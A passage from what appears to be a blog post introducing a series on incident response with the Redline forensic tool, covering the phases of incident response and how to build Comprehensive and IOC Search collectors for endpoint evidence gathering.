your organization finance your Incident Response capabilities with ‘Great Job!’ approach.) IR activities can be divided into following steps: Analysis: collect data (locally or remotely, manually or automatically) analyze data build timelines and recreate what happened Scoping: create indicators of compromise (IOC) based on TTP (tools, tactics, procedures) deploy IOC (create rules across monitoring platforms, sweep estate) monitor estate for new suspicious activity Keep in mind that it is highly likely that you might not be the person that will execute the tools, and you will need to rely on someone (administrators, local support, janitor?) to perform one of the most crucial part of every investigation - collection of evidence - for you. Thus it would be really good to have this process automated and easy to use. Standard disclaimer. Before we start playing with Redline it’s definitely a good idea to first test it in a safe environment! Feel free to check official documentation to be sure that you know what you are doing. This series will leverage capabilities of Redline in some example scenario and build a basic process around it. Keep in mind that if you have any other ideas, doubts or experience please feel free to share it so we could all learn from it! Redline allows analyst to build endpoint collectors. In our scenario we will use Comprehensive and IOC Collectors. Official manual states that: “Comprehensive Collector configures scripts to gather most of the data that Redline collects and analyzes. Use this type of Redline Collector if you intend to do a full analysis or if you have only one opportunity to collect data from a computer.” “IOC Search Collector. The IOC Search Collector collects data that matches selected Indicators of Compromise (IOCs). Use this Redline Collector type when you are looking only for IOC hits and not any other potential compromises. By default, it filters out any data that does not match an IOC, but you can opt to collect additional data.” Creating a Comprehensive Collector Select the type of collector: Click on Edit your script to review what data will be collected. Tick a box if you want to acquire memory. General recommendation - acquire memory whenever it is possible (legal, bandwidth, HR approvals etc.). Memory forensics is an invaluable source of information and essential part of every investigation. At the bottom of the window select the name of the folder where collector will be stored and then press OK. Creating an IOC Collector Select IOC Search Collector: Select a folder containing indicators of compromise (see how to create IOC): Redline will parse content of the folder and display names of all IOCs: Select IOCs that should be included in the collector and than follow the same steps for creating a Comprehensive Collector. With know-how about building collectors, scenario in place and basic process, incident handlers are ready to collect data and investigate suspicious activity. In part 2 we will start the analysis with Redline. If you are wondering at this point why not just pull a plug, or separate suspected machine from a network, create a forensic image and perform full blown forensics? Bear with me until the end of the series. However if you are really impatient, using collectors allows you to act faster and start investigation and basic containment while your forensic images are still uploading or waiting for segregation in Fedex storage room. Oh, by the way it is far more easier to get approval for ‘acquiring metadata’ rather than full image straight away, especially when user traffic and data is involved.